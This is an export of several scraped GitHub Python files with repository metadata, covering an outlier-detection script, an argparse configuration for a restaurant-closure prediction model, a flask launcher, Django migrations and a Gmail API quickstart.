# C5 = [3, -2] + 1.6 * np.random.randn(n_points_per_cluster, 2)
# C6 = [5, 6] + 2 * np.random.randn(n_points_per_cluster, 2)
# coords = np.vstack((C1, C2, C3, C4, C5, C6))
##
from sklearn.neighbors import LocalOutlierFactor
from sklearn.ensemble import IsolationForest
LOF = LocalOutlierFactor(n_neighbors=20)
iForest = IsolationForest()
LOF.fit(coords)
lof_labels = LOF.fit_predict(coords)
iForest.fit(coords)
iforest_labels = iForest.predict(coords)
lof_scores = LOF.negative_outlier_factor_
LOF.threshold_
if_scores = iForest.decision_function(coords)
iForest.threshold_
# plot normalized scores
plt.figure()
plt.plot((lof_scores - np.mean(lof_scores))/np.std(lof_scores))
plt.plot((if_scores - np.mean(if_scores))/np.std(if_scores))
plt.hlines((LOF.threshold_ - np.mean(lof_scores))/np.std(lof_scores),xmin=0,xmax=coords.shape[0],color='steelblue')
plt.hlines((iForest.threshold_ - np.mean(if_scores))/np.std(if_scores),xmin=0,xmax=coords.shape[0],color='coral')
plt.show()
|
[
"noreply@github.com"
] |
jywang2016.noreply@github.com
|
7cb899c9ef10872fd3b76e309dcb6ff0b2775ec2
|
3474e05ca41d697e8500981a81f195131031afb7
|
/src/constants.py
|
2283c18620165e5ce7e43e7bf4defee2837fc6ef
|
[
"BSD-3-Clause"
] |
permissive
|
mayadeh-kooti/mne-bids-pipeline-runner
|
1a3458659d9b2b690a63c12828d9618c910c66df
|
8690c438c2a45c37fdd66d20c0a8794f028a0dbb
|
refs/heads/main
| 2023-05-04T16:06:51.855304 | 2021-05-26T09:00:27 | 2021-05-26T09:00:27 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 60 |
py
|
GIT_REPO_URI = 'git@github.com:mne-tools/mne-bids-pipeline'
|
[
"richard.hoechenberger@gmail.com"
] |
richard.hoechenberger@gmail.com
|
207c6ccefcf7af5a19bcab4956f9c8cf3e50ddbb
|
5705b51fa12e7edb9ad0eae55f4de92aaddf43e4
|
/parser_CAML.py
|
9bdf909fadcca73b8b3bb849f6af41270b27621a
|
[] |
no_license
|
Complex-data/Predicting-Restaurant-Closure-Through-Deep-Concept-Explainable-Model
|
c05253e5f522ed29c22beb79fcd7f0d477c9b623
|
3bdd5fc1bef162790f4d53e2ab770cf1a41acc71
|
refs/heads/master
| 2020-09-26T09:55:27.292035 | 2020-05-19T07:21:48 | 2020-05-19T07:21:48 | 226,231,047 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 12,349 |
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
def build_parser():
""" This function produces the default argparser.
Note that NOT all args are actively used. I used a generic
argparser for all my projects, so you will surely see something that
is not used. The important arguments are provided in the main readme.
"""
parser = argparse.ArgumentParser()
ps = parser.add_argument
ps("--dataset", dest="dataset", type=str,
default='dianping', help="Which dataset?")
ps("--rnn_type", dest="rnn_type", type=str, metavar='<str>',
default='RAW_MSE_CAML_FN_FM', help="Compositional model name")
ps("--opt", dest="opt", type=str, metavar='<str>', default='Adam',
help="Optimization algorithm)")
ps("--emb_size", dest="emb_size", type=int, metavar='<int>',
default=30, help="Embeddings dimension (default=50)")
ps("--rnn_size", dest="rnn_size", type=int, metavar='<int>',
default=30, help="model-specific dimension. (default=50)")
ps("--rnn_dim", dest="rnn_dim", type=int, metavar='<int>',
default=30, help="model-specific dimension. (default=50)")
ps("--latent_size", dest="latent_size", type=int, metavar='<int>',
default=30, help="latent factor dimension for user/items. (default=50)")
ps("--key_word_lambda", dest="key_word_lambda", type=float, metavar='<float>',
default=1.0, help="The key word generation loss weight.")
ps("--use_lower", dest="use_lower", type=int, metavar='<int>',
default=1, help="Use all lowercase")
ps("--batch-size", dest="batch_size", type=int, metavar='<int>',
default=128, help="Batch size (default=128)")
ps("--allow_growth", dest="allow_growth", type=int, metavar='<int>',
default=0, help="Allow Growth")
ps("--dev_lr", dest='dev_lr', type=int,
metavar='<int>', default=0, help="Dev Learning Rate")
ps("--rnn_layers", dest="rnn_layers", type=int,
metavar='<int>', default=1, help="Number of RNN layers")
ps("--decay_epoch", dest="decay_epoch", type=int,
metavar='<int>', default=0, help="Decay everywhere n epochs")
ps("--num_proj", dest="num_proj", type=int, metavar='<int>',
default=1, help="Number of projection layers")
ps("--factor", dest="factor", type=int, metavar='<int>',
default=10, help="Number of factors (for FM model)")
ps("--dropout", dest="dropout", type=float, metavar='<float>',
default=0.8, help="The dropout probability.")
ps("--gen_lambda", dest="gen_lambda", type=float, metavar='<float>',
default=1.0, help="The generationg loss weight.")
ps("--rnn_dropout", dest="rnn_dropout", type=float, metavar='<float>',
default=0.8, help="The dropout probability.")
ps("--emb_dropout", dest="emb_dropout", type=float, metavar='<float>',
default=0.8, help="The dropout probability.")
ps("--pretrained", dest="pretrained", type=int, metavar='<int>',
default=0, help="Whether to use pretrained embeddings or not")
ps("--epochs", dest="epochs", type=int, metavar='<int>',
default=50, help="Number of epochs (default=50)")
ps('--gpu', dest='gpu', type=int, metavar='<int>',
default=0, help="Specify which GPU to use (default=0)")
ps("--hdim", dest='hdim', type=int, metavar='<int>',
default=30, help="Hidden layer size (default=50)")
ps("--lr", dest='learn_rate', type=float,
metavar='<float>', default=1E-3, help="Learning Rate")
ps("--clip_norm", dest='clip_norm', type=int,
metavar='<int>', default=1, help="Clip Norm value for gradients")
ps("--trainable", dest='trainable', type=int, metavar='<int>',
default=1, help="Trainable Word Embeddings (0|1)")
ps('--l2_reg', dest='l2_reg', type=float, metavar='<float>',
default=1E-6, help='L2 regularization, default=4E-6')
ps('--eval', dest='eval', type=int, metavar='<int>',
default=1, help='Epoch to evaluate results (default=1)')
ps('--log', dest='log', type=int, metavar='<int>',
default=1, help='1 to output to file and 0 otherwise')
ps('--dev', dest='dev', type=int, metavar='<int>',
default=1, help='1 for development set 0 to train-all')
ps('--seed', dest='seed', type=int, default=1337, help='random seed (not used)')
ps('--num_heads', dest='num_heads', type=int, default=1, help='number of heads')
ps("--hard", dest="hard", type=int, metavar='<int>',
default=1, help="Use hard att when using gumbel")
ps('--word_aggregate', dest='word_aggregate', type=str, default='MAX',
help='pooling type for key word loss')
ps("--average_embed", dest="average_embed", type=int, metavar='<int>',
default=1, help="Use average embedding of all reviews")
ps("--word_gumbel", dest="word_gumbel", type=int, metavar='<int>',
default=0, help="Use gumbel in the word(concept) level")
ps("--data_prepare", dest="data_prepare", type=int, metavar='<int>',
default=0, help="Data preparing type")
ps("--feed_rating", dest="feed_rating", type=int, metavar='<int>',
default=0, help="0 no feed, 1 feed groundtruth, 2 feed predicted rate")
ps("--masking", dest="masking", type=int, metavar='<int>',
default=1, help="Use masking and padding")
ps("--concept", dest="concept", type=int, metavar='<int>',
default=1, help="Use concept correlated components or not")
ps("--len_penalty", dest="len_penalty", type=int, metavar='<int>',
default=2, help="Regularization type for length balancing in beam search")
ps("--implicit", dest="implicit", type=int, metavar='<int>',
default=0, help="Use implicit factor or not")
ps("--category", dest="category", type=int, metavar='<int>',
default=0, help="Use item category factor or not")
ps("--heterougenous", dest="heterougenous", type=int, metavar='<int>',
default=0, help="Use item heterougenous factor or not")
ps("--att_reuse", dest="att_reuse", type=int, metavar='<int>',
default=0, help="Re-use attention or not")
ps('--tensorboard', action='store_true', help='To use tensorboard or not (may not work)')
ps('--early_stop', dest='early_stop', type=int,
metavar='<int>', default=5, help='early stopping')
ps('--wiggle_lr', dest='wiggle_lr', type=float,
metavar='<float>', default=1E-5, help='Wiggle lr')
ps('--wiggle_after', dest='wiggle_after', type=int,
metavar='<int>', default=0, help='Wiggle lr')
ps('--wiggle_score', dest='wiggle_score', type=float,
metavar='<float>', default=0.0, help='Wiggle score')
ps('--translate_proj', dest='translate_proj', type=int,
metavar='<int>', default=1, help='To translate project or not')
ps('--eval_train', dest='eval_train', type=int,
metavar='<int>', default=1, help='To eval on train set or not')
#ps('--data_link', dest='data_link', type=str, default='./data/City_4',
#ps('--data_link', dest='data_link', type=str, default='./data/City_7/new_5_City_7',
#ps('--data_link', dest='data_link', type=str, default='./data/City_2/clean_City_2',
#ps('--data_link', dest='data_link', type=str, default='./data/City_2/clean_4_City_2',
#ps('--data_link', dest='data_link', type=str, default='./data/City_2/clean_5_City_2',
#ps('--data_link', dest='data_link', type=str, default='./data/City_1/clean_City_1',
#ps('--data_link', dest='data_link', type=str, default='./data/City_1/clean_3_City_1',
#ps('--data_link', dest='data_link', type=str, default='./data/City_1/clean_4_City_1',
#ps('--data_link', dest='data_link', type=str, default='./data/City_1/clean_5_City_1',
#ps('--data_link', dest='data_link', type=str, default='./data/all_cities',
#ps('--data_link', dest='data_link', type=str, default='./data/City_4/clean_3_City_4',
#ps('--data_link', dest='data_link', type=str, default='./data/City_4/clean_4_City_4',
#ps('--data_link', dest='data_link', type=str, default='./data/City_5/clean_City_5',
ps('--data_link', dest='data_link', type=str, default='./data/City_4/clean_n_a_City_4',
#ps('--data_link', dest='data_link', type=str, default='./data/City_10/clean_City_10',
#ps('--data_link', dest='data_link', type=str, default='./data/City_4/clean_new_6_City_4',
#ps('--data_link', dest='data_link', type=str, default='./data/movie_100',
help='data link')
ps('--att_type', dest='att_type', type=str, default='SOFT',
help='attention type')
ps('--att_pool', dest='att_pool', type=str, default='MAX',
help='pooling type for attention')
ps('--word_pooling', dest='word_pooling', type=str, default='MEAN',
help='pooling type for word attention')
ps('--num_class', dest='num_class', type=int,
default=2, help='self explainatory..(not used for recommendation)')
ps('--all_dropout', action='store_true',
default=True, help='to dropout the embedding layer or not')
ps("--qmax", dest="qmax", type=int, metavar='<int>',
default=40, help="Max Length of Question (not used in rec)")
ps("--char_max", dest="char_max", type=int, metavar='<int>',
default=4, help="Max length of characters")
ps("--amax", dest="amax", type=int, metavar='<int>',
default=40, help="Max Length for Answer (not used in rec)")
ps("--smax", dest="smax", type=int, metavar='<int>',
default=30, help="Max Length of Sentences (per review)")
ps("--gmax", dest="gmax", type=int, metavar='<int>',
default=30, help="Max Length of Generated Reviews (per review)")
ps("--dmax", dest="dmax", type=int, metavar='<int>',
default=20, help="Max Number of documents (or reviews)")
ps("--num_neg", dest="num_neg", type=int, metavar='<int>',
default=6, help="Number of negative samples for pairwise training")
ps('--base_encoder', dest='base_encoder',
default='GLOVE', help='BaseEncoder for hierarchical models')
ps("--init", dest="init", type=float,
metavar='<float>', default=0.01, help="Init Params")
ps("--temperature", dest="temperature", type=float,
metavar='<float>', default=0.5, help="Temperature")
ps("--num_inter_proj", dest="num_inter_proj", type=int,
metavar='<int>', default=6, help="Number of inter projection layers")
ps("--num_com", dest="num_com", type=int,
metavar='<int>', default=1, help="Number of compare layers")
ps("--show_att", dest="show_att", type=int,
metavar='<int>', default=0, help="Display Attention")
ps("--write_qual", dest="write_qual", type=int,
metavar='<int>', default=0, help="write qual")
ps("--show_affinity", dest="show_affinity", type=int,
metavar='<int>', default=0, help="Display Affinity Matrix")
ps("--init_type", dest="init_type", type=str,
metavar='<str>', default='xavier', help="Init Type")
ps("--decay_lr", dest="decay_lr", type=float,
metavar='<float>', default=0, help="Decay Learning Rate")
ps("--decay_steps", dest="decay_steps", type=float,
metavar='<float>', default=0, help="Decay Steps (manual)")
ps("--decay_stairs", dest="decay_stairs", type=float,
metavar='<float>', default=1, help="To use staircase or not")
ps('--emb_type', dest='emb_type', type=str,
default='glove', help='embedding type')
ps('--log_dir', dest='log_dir', type=str,
default='City_1_logs', help='log directory')
ps('--gen_dir', dest='gen_dir', type=str,
default='City_1_logs', help='gen rouge file directory')
ps('--ref_dir', dest='gen_dir', type=str,
default='City_1_logs', help='ref rouge file directory')
ps('--model', dest='model', type=str,
default='City_1_logs', help='model path')
ps('--gen_true_dir', dest='gen_true_dir', type=str,
default='City_1_logs/explanation', help='gen true rouge file directory')
ps("--beam_size", dest="beam_size", type=int, metavar='<int>',
default=4, help="beam search size")
ps("--beam_number", dest="beam_number", type=int, metavar='<int>',
default=4, help="beam search number")
ps('--view_output', dest='view_output', type=str,
default='City_1_logs/explanation', help='view output')
#default='all_cities_logs/explanation', help='view output')
return parser
|
[
"noreply@github.com"
] |
Complex-data.noreply@github.com
|
337372f50741ea51f7f9a1fac05e88744cbe730f
|
7ab39c3457f5a944d9b4c02c23a445a50d807671
|
/venv/bin/flask
|
343e32d48da97dc73bcd0fd3f23b32e009a71b48
|
[
"MIT"
] |
permissive
|
jmtroll/my-resume2
|
aa462668b9805b99e1df44e6b3aae798cd7480fa
|
1f11f664c06a1a676e66440b775bd2263e2420ce
|
refs/heads/master
| 2021-09-14T14:03:46.285614 | 2018-05-14T20:33:05 | 2018-05-14T20:33:05 | 112,559,431 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 269 |
#!/Users/jmtroll/Desktop/Misy350/python/songbase-1/songbase/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"jmtroll@udel.edu"
] |
jmtroll@udel.edu
|
|
445127e0bd4c9c2071af44bf50ed006f99fa6f0f
|
c1f285c7fe5ede34fa8b9ccc1e978faf719c2956
|
/borrowers/migrations/0006_auto_20200514_0707.py
|
5778619d30ea59f6fa69b7d1bd2176b115a82c74
|
[] |
no_license
|
tadiparChinese/ucpbciif
|
cb5d5f0f09e9d5c58226ea8606b0fd77834c7294
|
9dbb6e5f1639b220ff163a962b58b0e13b5e18d0
|
refs/heads/master
| 2023-03-21T21:41:26.872229 | 2021-03-04T03:12:54 | 2021-03-04T03:12:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 387 |
py
|
# Generated by Django 2.1.7 on 2020-05-14 07:07
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('borrowers', '0005_auto_20200513_0653'),
]
operations = [
migrations.RenameField(
model_name='standingcommittee',
old_name='yearsInCooop',
new_name='yearsInCoop',
),
]
|
[
"krystjyn.enriquez@gmail.com"
] |
krystjyn.enriquez@gmail.com
|
677767ca7ceb624e8d26a88b9ec1aea211c9eb4c
|
29f5b2d3a3582afad36ce03d23ac8e25743c7a1d
|
/quickstart.py
|
4e6bea7265daf75d13f0f31247acd9327aebbe9f
|
[] |
no_license
|
kylinRao/djangowebbuild
|
9b1e1f32ae8b8872e950ff91658296d92113597e
|
75a06b8e35d50176d824e3a4e790a79796c28f70
|
refs/heads/master
| 2021-01-19T04:32:49.411920 | 2016-06-08T01:33:38 | 2016-06-08T01:33:38 | 60,658,778 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,301 |
py
|
from __future__ import print_function
import httplib2
import os
from apiclient import discovery
import oauth2client
from oauth2client import client
from oauth2client import tools
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/gmail-python-quickstart.json
SCOPES = 'https://www.googleapis.com/auth/gmail.readonly'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Gmail API Python Quickstart'
def get_credentials():
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'gmail-python-quickstart.json')
store = oauth2client.file.Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + credential_path)
return credentials
def main():
"""Shows basic usage of the Gmail API.
Creates a Gmail API service object and outputs a list of label names
of the user's Gmail account.
"""
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
service = discovery.build('gmail', 'v1', http=http)
results = service.users().labels().list(userId='me').execute()
labels = results.get('labels', [])
if not labels:
print('No labels found.')
else:
print('Labels:')
for label in labels:
print(label['name'])
if __name__ == '__main__':
main()
|
[
"975168367@qq.com"
] |
975168367@qq.com
|
6c5e70a7d16afe0964cf1c6742205d3fd6d8e7a4
|
ca24277734fc7a02d155f7d8b15e8e1b9888cef0
|
/Instagram/migrations/0012_post_likes.py
|
c02f54982bd3cb0614d8eec5eda9b084da4e7b9e
|
[] |
no_license
|
kvs-rajawat-bh/mtechProject
|
d64d574a1bbed732724707ecda275a9073dbe8ef
|
7042379e97bd4514f9ebda8e50e189e81cf20411
|
refs/heads/master
| 2020-04-21T11:24:09.214037 | 2019-02-12T04:17:32 | 2019-02-12T04:17:32 | 169,523,926 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 382 |
py
|
# Generated by Django 2.1.5 on 2019-02-11 20:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Instagram', '0011_auto_20190211_2150'),
]
operations = [
migrations.AddField(
model_name='post',
name='likes',
field=models.IntegerField(default=0),
),
]
|
[
"kvs.rajawat.bh@gmail.com"
] |
kvs.rajawat.bh@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.